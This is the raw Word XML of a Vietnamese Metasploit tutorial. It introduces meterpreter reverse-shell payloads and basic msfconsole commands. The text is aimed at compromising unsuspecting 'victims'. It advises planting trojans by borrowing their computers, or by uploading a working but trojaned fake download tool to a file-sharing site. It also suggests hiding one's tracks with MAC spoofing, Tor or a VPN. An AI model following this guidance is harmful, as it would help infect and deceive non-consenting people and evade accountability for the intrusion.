    <w:p w14:paraId="23F29921" w14:textId="77777777" w:rsidR="00CC1B92" w:rsidRP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Giao thức: reverse_tcp; reverse_tcp_dns; reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667370D5" w14:textId="2CE95C55" w:rsidR="00CC1B92" w:rsidRDefault="00CC1B92" w:rsidP="00CC1B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1B92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ví dụ: windows/meterpreter/reverse_tcp_dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B868D7" w14:textId="09C558FE" w:rsidR="00CC1B92" w:rsidRDefault="00D4645D" w:rsidP="00CC1B92">
      <w:pPr>
        <w:ind w:left="36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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3FA4A" w14:textId="3C8F91CD" w:rsidR="00CC1B92" w:rsidRDefault="00CC1B92" w:rsidP="00CC1B92">
      <w:pPr>
        <w:ind w:left="36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2. </w:t>
      </w:r>
      <w:r w:rsidR="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A611506" w14:textId="2D88CA96" w:rsidR="00D4645D" w:rsidRDefault="00D4645D" w:rsidP="00D4645D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="36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69705FF8" w14:textId="78B59222" w:rsidR="00D4645D" w:rsidRDefault="005A043D" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A043D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit là bộ công cụ hack có sẵn trong các phiên bản</w:t>
      </w:r>
      <w:r w:rsidR="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> linux như Kali linux, Backbox…</w:t>
      </w:r>
      <w:r w:rsidRPr="005A043D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhằm tấn công và khai thác các lỗ hổng bảo mật trên các nền tảng khác nhau như windows, linux, website, cisco, … Bạn vẫn có thể cài Metasploit trên các hđh linux khác (tham khảo link này), có cả phiên bản dành cho Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C5234" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00D4645D">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FF4866" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRPr="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="20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Có 2 hình thức khi sử dụng Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778954C8" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRPr="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8673CA" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRPr="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>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Sử dụng các module để dò quét và tấn công vào lỗ hổng bảo mật của đối tượng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52448B87" w14:textId="43150564" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>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Tạo mã độc (trojan), rồi bằng một cách nào đó truyền mã độc vào máy nạn nhân và nạn nhân kích hoạt nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8F934" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E314154" w14:textId="1870091E" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="56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Đánh vào lỗ hổng bảo mật phụ thuộc vào việc máy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim có để hổng lỗ nào hay không</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Nó có thể là những dịch vụ mạng mà tính bảo mật kém mà máy victim đang chạy. Dĩ nhiên má</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>y victim mà bế quan toả cảng, không</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> mở port nào cả thì ta chẳng thể thâm nhập được từ bên ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A822B" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D005CED" w14:textId="1AEA8BDC" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="56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 xml:space="preserve">Cài trojan đòi hỏi phải bằng cách một cách nào đó attacker truyền trojan và thực thi nó trên máy victim. Bạn phải trực tiếp mó tay </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vào máy nạn nhân, ví dụ “cho</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> mượn máy v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ào mạng tí” hay “đưa máy đây</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cài win cho”; hoặc dụ nạn nhân tải và mở file độc hại ấy, ví dụ như bạn up lên fshare file có tên “tool-get-link-jav-hd.exe”, nạn nhân tưởng thật tải về rồi nhấn mở chạy, khi đó máy nạn nhân chính thức bị hack (để kế hoạch hoàn hảo hơn, tool ấy getlink được thật, nhưng đồng thời nó ngấm ngầm chạy mã độc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33042D52" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424B77AF" w14:textId="6A629EB9" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngồi dò quét lỗ hổng tính khả thi thấp, bởi hầu hết các lỗ hổng định nghĩa trong Metasploit bây giờ đều đã có bản vá lỗi, bạn phải trông chờ vào việc cập nhật những module mới ra lò của Metasploit hoặc lấy từ nguồn bên ngoài mà trong thời gian hiện tại chưa có ai vá, hoặc xác suất nhỏ rằng máy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nạn nhân “rỗ” tùm lum, không</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> update bản vá hay phần mềm đã lỗi thời. Cài trojan thì tính chủ động cao hơn, nhưng cũng rất dễ khiến bạn bị lộ mặt nếu nạn nhân ngoại suy ra những ai đã từng động vào máy của họ. Hay nói cách khác, tính khả thi của phương pháp này phụ thuộc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào nạn nhân có nghi ngờ hay không</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Phương pháp thứ nhất thì đảm bảo an toàn cho ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ười tấn công hơn, vì nạn nhân không</w:t>
      </w:r>
      <w:r w:rsidRPr="00254EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> hề hay biết (gọi là an toàn khi victim là người dùng phổ thông thôi, chứ bạn tấn công theo phương pháp nào cũng để lại dấu vết, phải đánh lạc hướng người truy dấu bằng cách giả mạo địa chỉ MAC hay ẩn danh qua mạng Tor hoặc VPN. Cách để bảo vệ bản thân khỏi sự truy dấu, mình sẽ đề cập sau).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755EBA9" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763E870F" w14:textId="3E51FE18" w:rsidR="00254EEB" w:rsidRDefault="00254EEB"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1. Khởi động Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A6644" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E18C9AA" w14:textId="5BB1607B" w:rsidR="00254EEB" w:rsidRDefault="00254EEB"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Với phiên bản Metasploit 5.0 ta khởi động Metasploit bằng lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Các phiên bản khác, ví dụ như phiên bản Metasploit 4.9.3 cách khởi động bằng lệnh: msfcli –h).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900B875" w14:textId="77777777" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECF31D0" w14:textId="23ACA9CA" w:rsidR="00254EEB" w:rsidRDefault="00254EEB" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A478EF" w:rsidRPr="00A478EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9CEB00" wp14:editId="1A34D7D7">
            <wp:extent cx="5727700" cy="358267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82670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A478EF" w:rsidRPr="00A478EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A478EF" w:rsidRPr="00A478EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D96D0B" wp14:editId="31F1DDCC">
            <wp:extent cx="5727700" cy="1040765"/>
            <wp:effectExtent l="0" t="0" r="1270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040765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6B9E5" w14:textId="77777777" w:rsidR="00A478EF" w:rsidRDefault="00A478EF" w:rsidP="00254EEB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EED6AD" w14:textId="6D0593DB" w:rsidR="00021025" w:rsidRDefault="00870C89" w:rsidP="00D83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2. Sử dụng Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06188C" w14:textId="12F49578" w:rsidR="00D83F08" w:rsidRDefault="00D83F08" w:rsidP="00D83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2.2.1. Chọn module exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C82EA1" w14:textId="7D45781E" w:rsidR="00EC56BD" w:rsidRDefault="00EC56BD" w:rsidP="00EC56B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Lựa chọn </w:t>
      </w:r>
      <w:r w:rsidR="00663FD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>chương trình,</w:t>
      </w:r>
      <w:r w:rsidR="00B2187B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362A858" w14:textId="77777777" w:rsidR="00074A87" w:rsidRPr="00074A87" w:rsidRDefault="00B2187B"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00E838B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show exploit:</w:t>
      </w:r>
      <w:r w:rsidR="00E838B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> xem các module exploit </w:t>
      </w:r>
      <w:r w:rsidR="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">mà </w:t>
      </w:r>
      <w:r w:rsidR="00074A87" w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">framework có hỗ trợ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE12643" w14:textId="5D1FCC43" w:rsidR="00074A87" w:rsidRP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use</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: chọn module exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85C092" w14:textId="276D4CBE"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info </w:t>
      </w:r>
      <w:r w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00074A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">: xem thông tin về module exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE0F8B" w14:textId="77777777"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p>
    <w:p w14:paraId="2725D7C9" w14:textId="4DA4191F"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2.2. Cấu hình module exploit đã chọn</w:t>
      </w:r>
    </w:p>
